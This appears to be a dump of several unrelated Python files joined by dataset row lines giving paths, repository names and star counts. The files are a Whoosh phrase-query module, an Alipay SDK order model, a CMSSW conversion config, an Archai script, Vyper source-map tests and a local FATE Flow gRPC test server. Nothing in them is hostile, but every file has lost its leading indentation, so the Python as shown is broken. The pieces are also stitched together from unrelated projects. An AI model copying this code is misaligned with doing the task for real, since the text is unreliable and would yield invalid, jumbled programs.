# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
from __future__ import division
import copy
from whoosh import matching
from whoosh.analysis import Token
from whoosh.compat import u
from whoosh.query import qcore, terms, compound
class Sequence(compound.CompoundQuery):
"""Matches documents containing a list of sub-queries in adjacent
positions.
This object has no sanity check to prevent you from using queries in
different fields.
"""
JOINT = " NEAR "
intersect_merge = True
def __init__(self, subqueries, slop=1, ordered=True, boost=1.0):
"""
:param subqueries: a list of :class:`whoosh.query.Query` objects to
match in sequence.
:param slop: the maximum difference in position allowed between the
subqueries.
:param ordered: if True, the position differences between subqueries
must be positive (that is, each subquery in the list must appear
after the previous subquery in the document).
:param boost: a boost factor to add to the score of documents matching
this query.
"""
compound.CompoundQuery.__init__(self, subqueries, boost=boost)
self.slop = slop
self.ordered = ordered
def __eq__(self, other):
return (other and type(self) is type(other)
and self.subqueries == other.subqueries
and self.boost == other.boost)
def __repr__(self):
return "%s(%r, slop=%d, boost=%f)" % (self.__class__.__name__,
self.subqueries, self.slop,
self.boost)
def __hash__(self):
h = hash(self.slop) ^ hash(self.boost)
for q in self.subqueries:
h ^= hash(q)
return h
def normalize(self):
# Because the subqueries are in sequence, we can't do the fancy merging
# that CompoundQuery does
return self.__class__([q.normalize() for q in self.subqueries],
self.slop, self.ordered, self.boost)
def _and_query(self):
return compound.And(self.subqueries)
def estimate_size(self, ixreader):
return self._and_query().estimate_size(ixreader)
def estimate_min_size(self, ixreader):
return self._and_query().estimate_min_size(ixreader)
def _matcher(self, subs, searcher, context):
from whoosh.query.spans import SpanNear
# Tell the sub-queries this matcher will need the current match to get
# spans
context = context.set(needs_current=True)
m = self._tree_matcher(subs, SpanNear.SpanNearMatcher, searcher,
context, None, slop=self.slop,
ordered=self.ordered)
return m
class Ordered(Sequence):
"""Matches documents containing a list of sub-queries in the given order.
"""
JOINT = " BEFORE "
def _matcher(self, subs, searcher, context):
from whoosh.query.spans import SpanBefore
return self._tree_matcher(subs, SpanBefore._Matcher, searcher,
context, None)
class Phrase(qcore.Query):
"""Matches documents containing a given phrase."""
def __init__(self, fieldname, words, slop=1, boost=1.0, char_ranges=None):
"""
:param fieldname: the field to search.
:param words: a list of words (unicode strings) in the phrase.
:param slop: the number of words allowed between each "word" in the
phrase; the default of 1 means the phrase must match exactly.
:param boost: a boost factor that to apply to the raw score of
documents matched by this query.
:param char_ranges: if a Phrase object is created by the query parser,
it will set this attribute to a list of (startchar, endchar) pairs
corresponding to the words in the phrase
"""
self.fieldname = fieldname
self.words = words
self.slop = slop
self.boost = boost
self.char_ranges = char_ranges
def __eq__(self, other):
return (other and self.__class__ is other.__class__
and self.fieldname == other.fieldname
and self.words == other.words
and self.slop == other.slop
and self.boost == other.boost)
def __repr__(self):
return "%s(%r, %r, slop=%s, boost=%f)" % (self.__class__.__name__,
self.fieldname, self.words,
self.slop, self.boost)
def __unicode__(self):
return u('%s:"%s"') % (self.fieldname, u(" ").join(self.words))
__str__ = __unicode__
def __hash__(self):
h = hash(self.fieldname) ^ hash(self.slop) ^ hash(self.boost)
for w in self.words:
h ^= hash(w)
return h
def has_terms(self):
return True
def terms(self, phrases=False):
if phrases and self.field():
for word in self.words:
yield (self.field(), word)
def tokens(self, boost=1.0):
char_ranges = self.char_ranges
startchar = endchar = None
for i, word in enumerate(self.words):
if char_ranges:
startchar, endchar = char_ranges[i]
yield Token(fieldname=self.fieldname, text=word,
boost=boost * self.boost, startchar=startchar,
endchar=endchar, chars=True)
def normalize(self):
if not self.words:
return qcore.NullQuery
if len(self.words) == 1:
t = terms.Term(self.fieldname, self.words[0])
if self.char_ranges:
t.startchar, t.endchar = self.char_ranges[0]
return t
words = [w for w in self.words if w is not None]
return self.__class__(self.fieldname, words, slop=self.slop,
boost=self.boost, char_ranges=self.char_ranges)
def replace(self, fieldname, oldtext, newtext):
q = copy.copy(self)
if q.fieldname == fieldname:
for i, word in enumerate(q.words):
if word == oldtext:
q.words[i] = newtext
return q
def _and_query(self):
return compound.And([terms.Term(self.fieldname, word)
for word in self.words])
def estimate_size(self, ixreader):
return self._and_query().estimate_size(ixreader)
def estimate_min_size(self, ixreader):
return self._and_query().estimate_min_size(ixreader)
def matcher(self, searcher, context=None):
from whoosh.query import Term, SpanNear2
fieldname = self.fieldname
if fieldname not in searcher.schema:
return matching.NullMatcher()
field = searcher.schema[fieldname]
if not field.format or not field.format.supports("positions"):
raise qcore.QueryError("Phrase search: %r field has no positions"
% self.fieldname)
terms = []
# Build a list of Term queries from the words in the phrase
reader = searcher.reader()
for word in self.words:
try:
word = field.to_bytes(word)
except ValueError:
return matching.NullMatcher()
if (fieldname, word) not in reader:
# Shortcut the query if one of the words doesn't exist.
return matching.NullMatcher()
terms.append(Term(fieldname, word))
# Create the equivalent SpanNear2 query from the terms
q = SpanNear2(terms, slop=self.slop, ordered=True, mindist=1)
# Get the matcher
m = q.matcher(searcher, context)
if self.boost != 1.0:
m = matching.WrappingMatcher(m, boost=self.boost)
return m
|
alipay/aop/api/domain/AlipayBusinessOrderScenicTrafficSyncModel.py
|
antopen/alipay-sdk-python-all
| 213 |
70690
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ScenicTrafficUserInfo import ScenicTrafficUserInfo
from alipay.aop.api.domain.ScenicExtInfo import ScenicExtInfo
from alipay.aop.api.domain.ScenicTrafficTicketInfo import ScenicTrafficTicketInfo
class AlipayBusinessOrderScenicTrafficSyncModel(object):
def __init__(self):
self._amount = None
self._app_name = None
self._appid = None
self._contact = None
self._discount_amount = None
self._ext_info = None
self._order_create_time = None
self._order_id = None
self._order_link = None
self._order_modified_time = None
self._order_pay_time = None
self._order_source = None
self._order_status = None
self._outer_order_id = None
self._pay_amount = None
self._payment_method = None
self._refund_amount = None
self._refund_status = None
self._refund_ticket_num = None
self._refund_time = None
self._ticket_info = None
self._trade_no = None
self._uid = None
@property
def amount(self):
return self._amount
@amount.setter
def amount(self, value):
self._amount = value
@property
def app_name(self):
return self._app_name
@app_name.setter
def app_name(self, value):
self._app_name = value
@property
def appid(self):
return self._appid
@appid.setter
def appid(self, value):
self._appid = value
@property
def contact(self):
return self._contact
@contact.setter
def contact(self, value):
if isinstance(value, ScenicTrafficUserInfo):
self._contact = value
else:
self._contact = ScenicTrafficUserInfo.from_alipay_dict(value)
@property
def discount_amount(self):
return self._discount_amount
@discount_amount.setter
def discount_amount(self, value):
self._discount_amount = value
@property
def ext_info(self):
return self._ext_info
@ext_info.setter
def ext_info(self, value):
if isinstance(value, ScenicExtInfo):
self._ext_info = value
else:
self._ext_info = ScenicExtInfo.from_alipay_dict(value)
@property
def order_create_time(self):
return self._order_create_time
@order_create_time.setter
def order_create_time(self, value):
self._order_create_time = value
@property
def order_id(self):
return self._order_id
@order_id.setter
def order_id(self, value):
self._order_id = value
@property
def order_link(self):
return self._order_link
@order_link.setter
def order_link(self, value):
self._order_link = value
@property
def order_modified_time(self):
return self._order_modified_time
@order_modified_time.setter
def order_modified_time(self, value):
self._order_modified_time = value
@property
def order_pay_time(self):
return self._order_pay_time
@order_pay_time.setter
def order_pay_time(self, value):
self._order_pay_time = value
@property
def order_source(self):
return self._order_source
@order_source.setter
def order_source(self, value):
self._order_source = value
@property
def order_status(self):
return self._order_status
@order_status.setter
def order_status(self, value):
self._order_status = value
@property
def outer_order_id(self):
return self._outer_order_id
@outer_order_id.setter
def outer_order_id(self, value):
self._outer_order_id = value
@property
def pay_amount(self):
return self._pay_amount
@pay_amount.setter
def pay_amount(self, value):
self._pay_amount = value
@property
def payment_method(self):
return self._payment_method
@payment_method.setter
def payment_method(self, value):
self._payment_method = value
@property
def refund_amount(self):
return self._refund_amount
@refund_amount.setter
def refund_amount(self, value):
self._refund_amount = value
@property
def refund_status(self):
return self._refund_status
@refund_status.setter
def refund_status(self, value):
self._refund_status = value
@property
def refund_ticket_num(self):
return self._refund_ticket_num
@refund_ticket_num.setter
def refund_ticket_num(self, value):
self._refund_ticket_num = value
@property
def refund_time(self):
return self._refund_time
@refund_time.setter
def refund_time(self, value):
self._refund_time = value
@property
def ticket_info(self):
return self._ticket_info
@ticket_info.setter
def ticket_info(self, value):
if isinstance(value, list):
self._ticket_info = list()
for i in value:
if isinstance(i, ScenicTrafficTicketInfo):
self._ticket_info.append(i)
else:
self._ticket_info.append(ScenicTrafficTicketInfo.from_alipay_dict(i))
@property
def trade_no(self):
return self._trade_no
@trade_no.setter
def trade_no(self, value):
self._trade_no = value
@property
def uid(self):
return self._uid
@uid.setter
def uid(self, value):
self._uid = value
def to_alipay_dict(self):
params = dict()
if self.amount:
if hasattr(self.amount, 'to_alipay_dict'):
params['amount'] = self.amount.to_alipay_dict()
else:
params['amount'] = self.amount
if self.app_name:
if hasattr(self.app_name, 'to_alipay_dict'):
params['app_name'] = self.app_name.to_alipay_dict()
else:
params['app_name'] = self.app_name
if self.appid:
if hasattr(self.appid, 'to_alipay_dict'):
params['appid'] = self.appid.to_alipay_dict()
else:
params['appid'] = self.appid
if self.contact:
if hasattr(self.contact, 'to_alipay_dict'):
params['contact'] = self.contact.to_alipay_dict()
else:
params['contact'] = self.contact
if self.discount_amount:
if hasattr(self.discount_amount, 'to_alipay_dict'):
params['discount_amount'] = self.discount_amount.to_alipay_dict()
else:
params['discount_amount'] = self.discount_amount
if self.ext_info:
if hasattr(self.ext_info, 'to_alipay_dict'):
params['ext_info'] = self.ext_info.to_alipay_dict()
else:
params['ext_info'] = self.ext_info
if self.order_create_time:
if hasattr(self.order_create_time, 'to_alipay_dict'):
params['order_create_time'] = self.order_create_time.to_alipay_dict()
else:
params['order_create_time'] = self.order_create_time
if self.order_id:
if hasattr(self.order_id, 'to_alipay_dict'):
params['order_id'] = self.order_id.to_alipay_dict()
else:
params['order_id'] = self.order_id
if self.order_link:
if hasattr(self.order_link, 'to_alipay_dict'):
params['order_link'] = self.order_link.to_alipay_dict()
else:
params['order_link'] = self.order_link
if self.order_modified_time:
if hasattr(self.order_modified_time, 'to_alipay_dict'):
params['order_modified_time'] = self.order_modified_time.to_alipay_dict()
else:
params['order_modified_time'] = self.order_modified_time
if self.order_pay_time:
if hasattr(self.order_pay_time, 'to_alipay_dict'):
params['order_pay_time'] = self.order_pay_time.to_alipay_dict()
else:
params['order_pay_time'] = self.order_pay_time
if self.order_source:
if hasattr(self.order_source, 'to_alipay_dict'):
params['order_source'] = self.order_source.to_alipay_dict()
else:
params['order_source'] = self.order_source
if self.order_status:
if hasattr(self.order_status, 'to_alipay_dict'):
params['order_status'] = self.order_status.to_alipay_dict()
else:
params['order_status'] = self.order_status
if self.outer_order_id:
if hasattr(self.outer_order_id, 'to_alipay_dict'):
params['outer_order_id'] = self.outer_order_id.to_alipay_dict()
else:
params['outer_order_id'] = self.outer_order_id
if self.pay_amount:
if hasattr(self.pay_amount, 'to_alipay_dict'):
params['pay_amount'] = self.pay_amount.to_alipay_dict()
else:
params['pay_amount'] = self.pay_amount
if self.payment_method:
if hasattr(self.payment_method, 'to_alipay_dict'):
params['payment_method'] = self.payment_method.to_alipay_dict()
else:
params['payment_method'] = self.payment_method
if self.refund_amount:
if hasattr(self.refund_amount, 'to_alipay_dict'):
params['refund_amount'] = self.refund_amount.to_alipay_dict()
else:
params['refund_amount'] = self.refund_amount
if self.refund_status:
if hasattr(self.refund_status, 'to_alipay_dict'):
params['refund_status'] = self.refund_status.to_alipay_dict()
else:
params['refund_status'] = self.refund_status
if self.refund_ticket_num:
if hasattr(self.refund_ticket_num, 'to_alipay_dict'):
params['refund_ticket_num'] = self.refund_ticket_num.to_alipay_dict()
else:
params['refund_ticket_num'] = self.refund_ticket_num
if self.refund_time:
if hasattr(self.refund_time, 'to_alipay_dict'):
params['refund_time'] = self.refund_time.to_alipay_dict()
else:
params['refund_time'] = self.refund_time
if self.ticket_info:
if isinstance(self.ticket_info, list):
for i in range(0, len(self.ticket_info)):
element = self.ticket_info[i]
if hasattr(element, 'to_alipay_dict'):
self.ticket_info[i] = element.to_alipay_dict()
if hasattr(self.ticket_info, 'to_alipay_dict'):
params['ticket_info'] = self.ticket_info.to_alipay_dict()
else:
params['ticket_info'] = self.ticket_info
if self.trade_no:
if hasattr(self.trade_no, 'to_alipay_dict'):
params['trade_no'] = self.trade_no.to_alipay_dict()
else:
params['trade_no'] = self.trade_no
if self.uid:
if hasattr(self.uid, 'to_alipay_dict'):
params['uid'] = self.uid.to_alipay_dict()
else:
params['uid'] = self.uid
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayBusinessOrderScenicTrafficSyncModel()
if 'amount' in d:
o.amount = d['amount']
if 'app_name' in d:
o.app_name = d['app_name']
if 'appid' in d:
o.appid = d['appid']
if 'contact' in d:
o.contact = d['contact']
if 'discount_amount' in d:
o.discount_amount = d['discount_amount']
if 'ext_info' in d:
o.ext_info = d['ext_info']
if 'order_create_time' in d:
o.order_create_time = d['order_create_time']
if 'order_id' in d:
o.order_id = d['order_id']
if 'order_link' in d:
o.order_link = d['order_link']
if 'order_modified_time' in d:
o.order_modified_time = d['order_modified_time']
if 'order_pay_time' in d:
o.order_pay_time = d['order_pay_time']
if 'order_source' in d:
o.order_source = d['order_source']
if 'order_status' in d:
o.order_status = d['order_status']
if 'outer_order_id' in d:
o.outer_order_id = d['outer_order_id']
if 'pay_amount' in d:
o.pay_amount = d['pay_amount']
if 'payment_method' in d:
o.payment_method = d['payment_method']
if 'refund_amount' in d:
o.refund_amount = d['refund_amount']
if 'refund_status' in d:
o.refund_status = d['refund_status']
if 'refund_ticket_num' in d:
o.refund_ticket_num = d['refund_ticket_num']
if 'refund_time' in d:
o.refund_time = d['refund_time']
if 'ticket_info' in d:
o.ticket_info = d['ticket_info']
if 'trade_no' in d:
o.trade_no = d['trade_no']
if 'uid' in d:
o.uid = d['uid']
return o
|
RecoEgamma/EgammaPhotonProducers/python/allConversions_cfi.py
|
ckamtsikis/cmssw
| 852 |
70708
|
<reponame>ckamtsikis/cmssw<filename>RecoEgamma/EgammaPhotonProducers/python/allConversions_cfi.py
import FWCore.ParameterSet.Config as cms
allConversions = cms.EDProducer('ConversionProducer',
AlgorithmName = cms.string('mixed'),
#src = cms.VInputTag(cms.InputTag("generalTracks")),
src = cms.InputTag("gsfGeneralInOutOutInConversionTrackMerger"),
convertedPhotonCollection = cms.string(''), ## or empty
bcEndcapCollection = cms.InputTag('particleFlowSuperClusterECAL:particleFlowBasicClusterECALEndcap'),
bcBarrelCollection = cms.InputTag('particleFlowSuperClusterECAL:particleFlowBasicClusterECALBarrel'),
scBarrelProducer = cms.InputTag('particleFlowSuperClusterECAL:particleFlowSuperClusterECALBarrel'),
scEndcapProducer = cms.InputTag('particleFlowSuperClusterECAL:particleFlowSuperClusterECALEndcapWithPreshower'),
primaryVertexProducer = cms.InputTag('offlinePrimaryVerticesWithBS'),
deltaEta = cms.double(0.4), #track pair search range in eta (applied even in case of preselection bypass)
HalfwayEta = cms.double(.1),# Track-bc matching search range on Eta
maxNumOfTrackInPU = cms.int32(999999),
maxTrackRho = cms.double(120.),
maxTrackZ = cms.double(300.),
minSCEt = cms.double(10.0),
dEtacutForSCmatching = cms.double(0.03),
dPhicutForSCmatching = cms.double(0.05),
dEtaTrackBC = cms.double(.2), # Track-Basic cluster matching, position diff on eta
dPhiTrackBC = cms.double(1.), # Track-Basic cluster matching, position diff on phi
EnergyBC = cms.double(0.3), # Track-Basic cluster matching, BC energy lower cut
EnergyTotalBC = cms.double(.3), # Track-Basic cluster matching, two BC energy summation cut
#tight cuts
d0 = cms.double(0.), #d0*charge cut
MaxChi2Left = cms.double(10.), #Track quality
MaxChi2Right = cms.double(10.),
MinHitsLeft = cms.int32(4),
MinHitsRight = cms.int32(2),
DeltaCotTheta = cms.double(0.1), #Track pair opening angle on R-Z
DeltaPhi = cms.double(.2), #Track pair opening angle on X-Y (not a final selection cut)
vtxChi2 = cms.double(0.0005),
MinApproachLow = cms.double(-.25), #Track pair min distance at approaching point on X-Y
MinApproachHigh = cms.double(1.0), #Track pair min distance at approaching point on X-Y
rCut = cms.double(2.0),#analytical track cross point
dz = cms.double(5.0),#track pair inner position difference
# kinematic vertex fit parameters
maxDelta = cms.double(0.01),#delta of parameters
maxReducedChiSq = cms.double(225.),#maximum chi^2 per degree of freedom before fit is terminated
minChiSqImprovement = cms.double(50.),#threshold for "significant improvement" in the fit termination logic
maxNbrOfIterations = cms.int32(40),#maximum number of convergence iterations
UsePvtx = cms.bool(True),
AllowD0 = cms.bool(True), #Allow d0*charge cut
AllowDeltaPhi = cms.bool(False),
AllowTrackBC = cms.bool(False), #Allow to match track-basic cluster
AllowDeltaCot = cms.bool(True), #Allow pairing using delta cot theta cut
AllowMinApproach = cms.bool(True), #Allow pairing using min approach cut
AllowOppCharge = cms.bool(True), #use opposite charge tracks to pair
AllowVertex = cms.bool(True),
bypassPreselGsf = cms.bool(True), #bypass preselection for gsf + X pairs
bypassPreselEcal = cms.bool(False), #bypass preselection for ecal-seeded + X pairs
bypassPreselEcalEcal = cms.bool(True), #bypass preselection for ecal-seeded + ecal-seeded pairs
AllowSingleLeg = cms.bool(False), #Allow single track conversion
AllowRightBC = cms.bool(False) #Require second leg matching basic cluster
)
from Configuration.Eras.Modifier_phase2_hgcal_cff import phase2_hgcal
phase2_hgcal.toModify( allConversions, bypassPreselGsf = False )
from Configuration.Eras.Modifier_fastSim_cff import fastSim
fastSim.toModify(allConversions, src = 'gsfGeneralConversionTrackMerger')
|
scripts/perf/model_size.py
|
cclauss/archai
| 344 |
70711
|
<filename>scripts/perf/model_size.py
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from archai.nas.model_desc import ModelDesc
from archai.common.common import common_init
from archai.nas.model import Model
from archai.algos.petridish.petridish_model_desc_builder import PetridishModelBuilder
from archai.common.model_summary import summary
conf = common_init(config_filepath='confs/petridish_cifar.yaml',
param_args=['--common.experiment_name', 'petridish_run2_seed42_eval'])
conf_eval = conf['nas']['eval']
conf_model_desc = conf_eval['model_desc']
conf_model_desc['n_cells'] = 14
template_model_desc = ModelDesc.load('$expdir/final_model_desc.yaml')
model_builder = PetridishModelBuilder()
model_desc = model_builder.build(conf_model_desc, template=template_model_desc)
mb = PetridishModelBuilder()
model = Model(model_desc, droppath=False, affine=False)
summary(model, [64, 3, 32, 32])
exit(0)
|
tests/compiler/test_source_map.py
|
upgradvisor/vyper
| 1,471 |
70713
|
<filename>tests/compiler/test_source_map.py
from vyper.compiler import compile_code
from vyper.compiler.output import _compress_source_map
from vyper.compiler.utils import expand_source_map
TEST_CODE = """
@internal
def _baz(a: int128) -> int128:
b: int128 = a
for i in range(2, 5):
b *= i
if b > 31337:
break
return b
@internal
def _bar(a: uint256) -> bool:
if a > 42:
return True
return False
@external
def foo(a: uint256) -> int128:
if self._bar(a):
return self._baz(2)
else:
return 42
"""
def test_jump_map():
source_map = compile_code(TEST_CODE, ["source_map"])["source_map"]
pos_map = source_map["pc_pos_map"]
jump_map = source_map["pc_jump_map"]
assert len([v for v in jump_map.values() if v == "o"]) == 1
assert len([v for v in jump_map.values() if v == "i"]) == 2
code_lines = [i + "\n" for i in TEST_CODE.split("\n")]
for pc in [k for k, v in jump_map.items() if v == "o"]:
lineno, col_offset, _, end_col_offset = pos_map[pc]
assert code_lines[lineno - 1][col_offset:end_col_offset].startswith("return")
for pc in [k for k, v in jump_map.items() if v == "i"]:
lineno, col_offset, _, end_col_offset = pos_map[pc]
assert code_lines[lineno - 1][col_offset:end_col_offset].startswith("self.")
def test_pos_map_offsets():
source_map = compile_code(TEST_CODE, ["source_map"])["source_map"]
expanded = expand_source_map(source_map["pc_pos_map_compressed"])
pc_iter = iter(source_map["pc_pos_map"][i] for i in sorted(source_map["pc_pos_map"]))
jump_iter = iter(source_map["pc_jump_map"][i] for i in sorted(source_map["pc_jump_map"]))
code_lines = [i + "\n" for i in TEST_CODE.split("\n")]
for item in expanded:
if item[-1] is not None:
assert next(jump_iter) == item[-1]
if item[:2] != [-1, -1]:
start, length = item[:2]
lineno, col_offset, end_lineno, end_col_offset = next(pc_iter)
assert code_lines[lineno - 1][col_offset] == TEST_CODE[start]
assert length == (
sum(len(i) for i in code_lines[lineno - 1 : end_lineno])
- col_offset
- (len(code_lines[end_lineno - 1]) - end_col_offset)
)
def test_compress_source_map():
code = """
@external
def foo() -> uint256:
return 42
"""
compressed = _compress_source_map(
code, {"0": None, "2": (2, 0, 4, 13), "3": (2, 0, 2, 8), "5": (2, 0, 2, 8)}, {"3": "o"}, 2
)
assert compressed == "-1:-1:2:-;1:45;:8::o;;"
def test_expand_source_map():
compressed = "-1:-1:0:-;;13:42:1;:21;::0:o;:::-;1::1;"
expanded = [
[-1, -1, 0, "-"],
[-1, -1, 0, None],
[13, 42, 1, None],
[13, 21, 1, None],
[13, 21, 0, "o"],
[13, 21, 0, "-"],
[1, 21, 1, None],
]
assert expand_source_map(compressed) == expanded
|
python/fate_flow/tests/grpc/server.py
|
hubert-he/FATE
| 3,787 |
70736
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import grpc
import requests
from grpc._cython import cygrpc
from fate_arch.common.base_utils import json_dumps, json_loads
from fate_flow.entity.runtime_config import RuntimeConfig
from fate_flow.settings import FATEFLOW_SERVICE_NAME, HEADERS, DEFAULT_REMOTE_REQUEST_TIMEOUT
from fate_flow.settings import IP, GRPC_PORT, stat_logger
from fate_flow.utils.proto_compatibility import basic_meta_pb2
from fate_flow.utils.proto_compatibility import proxy_pb2
from fate_flow.utils.proto_compatibility import proxy_pb2_grpc
import time
import sys
from fate_flow.tests.grpc.xthread import ThreadPoolExecutor
def wrap_grpc_packet(json_body, http_method, url, src_party_id, dst_party_id, job_id=None, overall_timeout=DEFAULT_REMOTE_REQUEST_TIMEOUT):
_src_end_point = basic_meta_pb2.Endpoint(ip=IP, port=GRPC_PORT)
_src = proxy_pb2.Topic(name=job_id, partyId="{}".format(src_party_id), role=FATEFLOW_SERVICE_NAME, callback=_src_end_point)
_dst = proxy_pb2.Topic(name=job_id, partyId="{}".format(dst_party_id), role=FATEFLOW_SERVICE_NAME, callback=None)
_task = proxy_pb2.Task(taskId=job_id)
_command = proxy_pb2.Command(name=FATEFLOW_SERVICE_NAME)
_conf = proxy_pb2.Conf(overallTimeout=overall_timeout)
_meta = proxy_pb2.Metadata(src=_src, dst=_dst, task=_task, command=_command, operator=http_method, conf=_conf)
_data = proxy_pb2.Data(key=url, value=bytes(json_dumps(json_body), 'utf-8'))
return proxy_pb2.Packet(header=_meta, body=_data)
def get_url(_suffix):
return "http://{}:{}/{}".format(RuntimeConfig.JOB_SERVER_HOST, RuntimeConfig.HTTP_PORT, _suffix.lstrip('/'))
class UnaryService(proxy_pb2_grpc.DataTransferServiceServicer):
def unaryCall(self, _request, context):
packet = _request
header = packet.header
_suffix = packet.body.key
param_bytes = packet.body.value
param = bytes.decode(param_bytes)
job_id = header.task.taskId
src = header.src
dst = header.dst
method = header.operator
param_dict = json_loads(param)
param_dict['src_party_id'] = str(src.partyId)
source_routing_header = []
for key, value in context.invocation_metadata():
source_routing_header.append((key, value))
stat_logger.info(f"grpc request routing header: {source_routing_header}")
param = bytes.decode(bytes(json_dumps(param_dict), 'utf-8'))
action = getattr(requests, method.lower(), None)
if action:
print(_suffix)
#resp = action(url=get_url(_suffix), data=param, headers=HEADERS)
else:
pass
#resp_json = resp.json()
resp_json = {"status": "test"}
import time
print("sleep")
time.sleep(60)
return wrap_grpc_packet(resp_json, method, _suffix, dst.partyId, src.partyId, job_id)
thread_pool_executor = ThreadPoolExecutor(max_workers=5)
print(f"start grpc server pool on {thread_pool_executor._max_workers} max workers")
server = grpc.server(thread_pool_executor,
options=[(cygrpc.ChannelArgKey.max_send_message_length, -1),
(cygrpc.ChannelArgKey.max_receive_message_length, -1)])
proxy_pb2_grpc.add_DataTransferServiceServicer_to_server(UnaryService(), server)
server.add_insecure_port("{}:{}".format("127.0.0.1", 7777))
server.start()
try:
while True:
time.sleep(60 * 60 * 24)
except KeyboardInterrupt:
server.stop(0)
sys.exit(0)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.